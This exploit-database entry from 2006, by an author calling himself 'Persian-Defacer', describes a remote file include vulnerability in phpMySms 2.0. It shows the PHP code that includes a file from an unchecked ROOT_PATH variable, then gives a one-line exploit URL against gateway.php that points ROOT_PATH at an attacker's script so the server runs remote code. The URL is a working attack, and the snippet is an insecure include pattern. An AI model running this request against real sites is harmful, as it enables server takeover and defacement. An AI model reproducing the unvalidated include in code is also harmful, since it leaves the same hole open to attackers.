phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability
# Published : 2006-06-24
# Author : Persian-Defacer
# Previous Title : DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit
# Next Title : Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)

PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]

# www.Syue.com [2006-06-24]